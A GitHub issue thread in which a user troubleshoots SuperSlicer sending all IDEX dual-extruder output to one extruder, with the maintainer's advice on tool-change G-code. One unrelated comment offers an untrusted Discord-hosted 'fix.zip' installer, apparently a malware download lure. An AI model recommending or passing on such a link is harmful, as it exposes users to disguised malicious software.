### ISSUE TITLE
only slicing with extruder 1

### ISSUE THREAD

**Issue by cptnmidnight** [supermerill/Slic3r#4412]
### What happened?

Trying to get an IDEX setup going, the linux version from 2.5.59.9 through 2.5.59.13 will not use any settings for extruder 2. everything sliced is going to extruder 1 only.
![Screenshot 2024-09-02 23:10:40](https://github.com/user-attachments/assets/0991eb53-6f91-4834-9b60-2c7b4291a353)

### Project file & How to reproduce

[Sindoh 3DWOX1 Filament Spool Spacer v6 - BOTTOM.zip](https://github.com/user-attachments/files/16844352/Sindoh.3DWOX1.Filament.Spool.Spacer.v6.-.BOTTOM.zip)

### Version

2.5.59.9+

### Operating system

Linux Mint 21

### Printer model

Sindoh 3DWOX x2

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by supermerill** [comment]
it's just that the gcode viewer can't understand if your toolchange custom gcode change the tool or not.
You can add a `T{next_extruder}` in it if it doesn't confuse your printer (or just to check the viewer).
Also, you use the "parallel printing steps", It seems that this feature broke the tool change, have to fix it. You should disable it in the meantime.

**Comment by cptnmidnight** [comment]
I have this for my tool change

`M104 {next_extruder} S{first_layer_temperature}		;Heat up the 1th nozzle - print temperature`
`M104{previous_extruder} S100`
`G0 F2400 Z0.200`
`{next_extruder}`
`G1 F1800 E0.00000`
`M107 {previous_extruder}`
`M109 {next_extruder} S{first_layer_temperature}`

I thought the middle line {next_extruder} should be putting T0 or T1 in the code

**Comment by cptnmidnight** [comment]
And this is the output T1 only shows up in the header and footer. No tool changes are getting into the actual gcode.
[Sindoh 3DWOX1 Filament Spool Spacer v6.gcode.zip](https://github.com/user-attachments/files/16899811/Sindoh.3DWOX1.Filament.Spool.Spacer.v6.gcode.zip)

**Comment by cptnmidnight** [comment]
sorry, just caught your detail of "T" in there. I will try this now.

**Comment by cptnmidnight** [comment]
The reason I left out the T is because the AMS uses an M-code that has L{next_extruder} and it was crashing the firmware with M298LT1 making me think that the place holder was including the T.
Tried T{next_extruder} still not working

added comment ;Change Tool and can only find the comment in the footer of the gcode

**Comment by cptnmidnight** [comment]
I am going to close this, I have been able to somewhat get it to work. I still have issues trying to get the custom g-code to co-operate with this printer. It will process single color and print just fine. I can get the output gcode to add tool changes but only for line type override. The printer firmware still vomits when I try to print in two color.
